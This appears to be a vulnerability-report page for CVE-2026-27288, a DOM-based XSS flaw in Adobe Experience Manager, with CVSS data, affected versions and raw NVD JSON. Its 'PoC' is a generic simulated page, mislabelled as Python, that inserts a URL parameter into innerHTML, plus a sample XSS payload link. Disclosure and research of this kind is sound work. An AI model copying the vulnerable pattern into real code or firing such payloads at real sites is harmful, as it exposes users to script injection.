Security Vulnerability Report
中文
CVE-2026-27288 CVSS 5.4 MEDIUM

CVE-2026-27288

Published: 2026-04-14 18:16:56
Last Modified: 2026-04-15 19:46:12
Source: [email protected]

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.24及更早版本
Adobe Experience Manager FP11.7及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for DOM-based XSS in Adobe Experience Manager Scenario: The vulnerable page takes a parameter from the URL and reflects it into the DOM without sanitization. --> <html> <body> <h2>AEM Vulnerable Page Component Simulation</h2> <div id="user-content">Loading...</div> <script> // Simulate the vulnerable logic found in the AEM component // In a real scenario, this might be parsing a hash or query param for configuration function initPage() { var params = new URLSearchParams(window.location.search); var userInput = params.get('config'); if (userInput) { // VULNERABILITY: Directly inserting user input into innerHTML document.getElementById('user-content').innerHTML = "Config: " + userInput; } else { document.getElementById('user-content').innerHTML = "No config provided."; } } initPage(); </script> </body> </html> <!-- Usage Example: Attacker sends link: http://victim-site/vulnerable-page.html?config=<img src=x onerror=alert('XSS')> Result: Victim sees an alert box executing JavaScript. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27288", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:56.450", "lastModified": "2026-04-15T19:46:11.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndIncluding": "6.5.24.0", "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.11.8", "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.